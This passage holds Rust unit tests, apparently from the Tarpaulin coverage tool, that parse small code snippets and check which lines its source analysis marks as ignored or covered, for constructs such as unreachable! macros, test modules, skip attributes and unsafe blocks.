= parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 1); assert!(lines.ignore.contains(&Lines::Line(3))); 
assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: " fn test() { writeln!( #\"test\"# ); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(5))); } #[test] fn filter_struct_members() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\npub struct Struct {\npub i: i32,\nj:String,\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 3); assert!(lines.ignore.contains(&Lines::Line(1))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\npub struct Struct (\n i32\n);", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.is_empty()); assert!(lines.ignore.contains(&Lines::Line(3))); } #[test] fn filter_enum_members() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\npub enum E {\nI1,\nI2(u32),\nI3{\nx:u32,\n},\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 3); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(6))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn filter_struct_consts() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct T{x:String, y:i32} fn test()-> T { T{ x:String::from(\"hello\"), //function call should be covered y:4, } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); } #[test] fn filter_unreachable_unchecked() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test() { core::hint::unreachable_unchecked(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_loop_attr() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test() { 
#[allow(clippy::option_unwrap_used)] loop { } #[allow(clippy::option_unwrap_used)] for i in 0..10 { } #[allow(clippy::option_unwrap_used)] while true { } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(8))); } #[test] fn filter_mods() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "mod foo {\nfn double(x:i32)->i32 {\n x*2\n}\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); let ctx = Context { config: &config, file_contents: "mod foo;", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); let ctx = Context { config: &config, file_contents: "mod foo{}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); } #[test] fn filter_macros() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "\n\nfn unused() {\nunimplemented!();\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); // Braces should be ignored so number could be higher assert!(!lines.ignore.is_empty()); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "\n\nfn unused() {\nunreachable!();\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.is_empty()); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { match x { 1 => 5, 2 => 7, _ => unreachable!(), } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn unused() {\nprintln!(\"text\");\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = 
SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_tests() { let config = Config::default(); let mut igconfig = Config::default(); igconfig.ignore_tests = true; let ctx = Context { config: &config, file_contents: "#[cfg(test)] mod tests { fn boo(){ assert!(true); }\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &igconfig, file_contents: "#[cfg(test)] mod tests { fn boo(){ assert!(true); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "#[test]\nfn mytest() { \n assert!(true);\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); let ctx = Context { config: &igconfig, file_contents: "#[test]\nfn mytest() { \n assert!(true);\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); } #[test] fn filter_test_utilities() { let mut config = Config::default(); config.ignore_tests = true; let ctx = Context { config: &config, file_contents: "trait Thing { #[cfg(test)] fn boo(){ assert!(true); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let config = Config::default(); let ctx = Context { config: &config, file_contents: "trait Thing { #[cfg(test)] fn boo(){ assert!(true); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); } #[test] fn filter_where() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn boop<T>() -> T where T:Default { T::default() }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = 
analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); let ctx = Context { config: &config, file_contents: "fn boop<T>() -> T where T:Default { T::default() }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); let ctx = Context { config: &config, file_contents: "trait foof { fn boop<T>() -> T where T:Default { T::default() } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); } #[test] fn filter_derives() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[derive(Debug)]\nstruct T;", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); let ctx = Context { config: &config, file_contents: "\n#[derive(Copy, Eq)]\nunion x { x:i32, y:f32}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_unsafe() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn unsafe_fn() {\n let x=1;\nunsafe {\nprintln!(\"{}\", x);\n}\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "fn unsafe_fn() {\n let x=1;\nunsafe {println!(\"{}\", x);}\n}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); } #[test] fn cover_generic_impl_methods() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct GenericStruct<T>(T); impl<T> GenericStruct<T> { fn hw(&self) { println!(\"hello world\"); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.cover.contains(&3)); assert!(lines.cover.contains(&4)); let ctx = Context { config: &config, file_contents: "struct GenericStruct<T>{v:Vec<T>} impl<T> Default for GenericStruct<T> { fn 
default() -> Self { T { v: vec![], } } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.cover.contains(&5)); } #[test] fn cover_default_trait_methods() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "trait Thing { fn hw(&self) { println!(\"hello world\"); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.cover.contains(&2)); assert!(lines.cover.contains(&3)); } #[test] fn filter_method_args() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct Thing; impl Thing{ fn hw(&self, name: &str) { println!(\"hello {}\", name); } //5 } fn get_name() -> String { return \"Daniel\".to_string() } //10 fn main() { let s=Thing{}; s.hw( \"Paul\" //15 ); s.hw( &get_name() ); //20 }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(15))); assert!(!lines.ignore.contains(&Lines::Line(19))); } #[test] fn filter_use_statements() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "use std::collections::HashMap; use std::{ffi::CString, os::raw::c_char};", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn include_inline_fns() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[inline] fn inline_func() { // I shouldn't be covered println!(\"I should\"); /* None of us should */ println!(\"But I will\"); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.cover.contains(&3)); assert!(lines.cover.contains(&4)); assert!(!lines.cover.contains(&5)); assert!(!lines.cover.contains(&6)); assert!(!lines.cover.contains(&7)); assert!(lines.cover.contains(&8)); } #[test] fn cover_callable_noargs() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn foo() { std::ptr::null::<i32>(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); } #[test] fn filter_closure_contents() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn inline_func() { 
(0..0).iter().foreach(|x| { unreachable!(); }); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); } #[test] fn tarpaulin_skip_attr() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[cfg(not(tarpaulin_include))] fn skipped() { println!(\"Hello world\"); } #[cfg_attr(tarpaulin, not_a_thing)] fn covered() { println!(\"hell world\"); } #[cfg(not(tarpaulin))] fn uncovered() { println!(\"goodbye world\"); } #[tarpaulin::skip] fn uncovered2() { println!(\"oof\"); } #[no_coverage] fn uncovered3() { println!(\"zombie lincoln\"); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(7))); assert!(!lines.ignore.contains(&Lines::Line(8))); assert!(lines.ignore.contains(&Lines::Line(12))); assert!(lines.ignore.contains(&Lines::Line(13))); assert!(lines.ignore.contains(&Lines::Line(17))); assert!(lines.ignore.contains(&Lines::Line(18))); assert!(lines.ignore.contains(&Lines::Line(22))); assert!(lines.ignore.contains(&Lines::Line(23))); let ctx = Context { config: &config, file_contents: "#[cfg(not(tarpaulin_include))] mod ignore_all { fn skipped() { println!(\"Hello world\"); } #[cfg_attr(tarpaulin, not_a_thing)] fn covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(8))); assert!(lines.ignore.contains(&Lines::Line(9))); } #[test] fn
() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "#[cfg(not(tarpaulin_include))] trait Foo { fn bar() { println!(\"Hello world\"); } fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(8))); assert!(lines.ignore.contains(&Lines::Line(9))); let ctx = Context { config: &config, file_contents: "trait Foo { fn bar() { println!(\"Hello world\"); } #[tarpaulin::skip] fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); } #[test] fn tarpaulin_skip_impl_attrs() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct Foo; #[tarpaulin::skip] impl Foo { fn bar() { println!(\"Hello world\"); } fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(9))); assert!(lines.ignore.contains(&Lines::Line(10))); let ctx = Context { config: &config, file_contents: "struct Foo; impl Foo { fn bar() { println!(\"Hello world\"); } #[cfg(not(tarpaulin_include))] fn not_covered() { println!(\"hell world\"); } } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(9))); assert!(lines.ignore.contains(&Lines::Line(10))); } #[test] fn filter_block_contents() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { match x { 1 => 5, 2 => 7, #[test] _ => { unreachable!(); }, } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn filter_consts() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn boo() { const x: u32 = 3; }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let 
parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); } #[test] fn optional_panic_ignore() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { assert_eq!(x, 0); debug_assert!(x != 3419); match x { 1 => 5, 2 => 7, _ => panic!(), } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(7))); let mut config = Config::default(); config.ignore_panics = true; let ctx = Context { config: &config, file_contents: "fn unreachable_match(x: u32) -> u32 { assert_eq!(x, 0); debug_assert!(x != 3419); match x { 1 => 5, 2 => 7, _ => panic!(), } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn filter_nested_blocks() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn block() { { loop { for i in 1..2 { if false { while let Some(x) = Some(6) { while false { if let Ok(y) = Ok(4) { unreachable!(); } } } } } } } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(9))); } #[test] fn filter_multi_line_decls() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn print_it(x:u32, y:u32, z:u32) { println!(\"{}:{}:{}\",x,y,z); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); let ctx = Context { config: &config, file_contents: "struct Boo; impl Boo { fn print_it(x:u32, y:u32, z:u32) { println!(\"{}:{}:{}\",x,y,z); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "trait Boo { fn print_it(x:u32, y:u32, z:u32) { println!(\"{}:{}:{}\",x,y,z); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = 
SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); } #[test] fn unreachable_propagate() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "enum Void {} fn empty_match(x: Void) -> u32 { match x { } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn foo() { if random() { loop { match random() { true => match void() {}, false => unreachable!() } } } else { call(); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(6))); assert!(lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); let ctx = Context { config: &config, file_contents: "fn test_unreachable() { let x: u32 = foo(); if x > 5 { bar(); } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(6))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn unreachable_include_returns() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() -> Result<(), Box<dyn std::error::Error>> { let x: u32 = foo(); if x > 5 { bar(); return true; } std::fs::remove_dir(\"I don't exist and will definitely fail/so yeahhhh...\")?; unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(!lines.ignore.contains(&Lines::Line(5))); assert!(!lines.ignore.contains(&Lines::Line(6))); assert!(!lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); let ctx = Context { config: &config, file_contents: "fn excluded_from_coverage(option: bool) -> bool { if option { return true; } if !option { return 
false; } unreachable!(); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(!lines.ignore.contains(&Lines::Line(5))); assert!(!lines.ignore.contains(&Lines::Line(6))); assert!(!lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); } #[test] fn unreachable_include_loops() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() { loop { bar(); } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); 